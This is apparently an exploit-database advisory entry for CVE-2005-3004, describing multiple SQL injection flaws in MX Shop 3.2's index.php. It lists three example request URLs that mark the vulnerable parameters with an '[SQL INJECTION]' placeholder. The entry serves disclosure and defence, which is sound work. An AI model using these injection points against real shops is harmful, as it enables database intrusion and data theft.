MX Shop 3.2 - 'index.php' Multiple SQL Injections

Author: David Sopas Ferreira
type: webapps
platform: php
port: 
date_added: 2005-09-19  
date_updated: 2013-06-18  
verified: 1  
codes: CVE-2005-3004;OSVDB-19611  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 26284.txt  
source: https://www.securityfocus.com/bid/14876/info

MX Shop is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.

Successful exploitation could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.

http://www.example.com/index.php?mod=pages&idp='[SQL INJECTION]
http://www.example.com/index.php?mod=pages&id_ctg='[SQL INJECTION]
http://www.example.com/index.php?mod=pages&id_prd='[SQL INJECTION]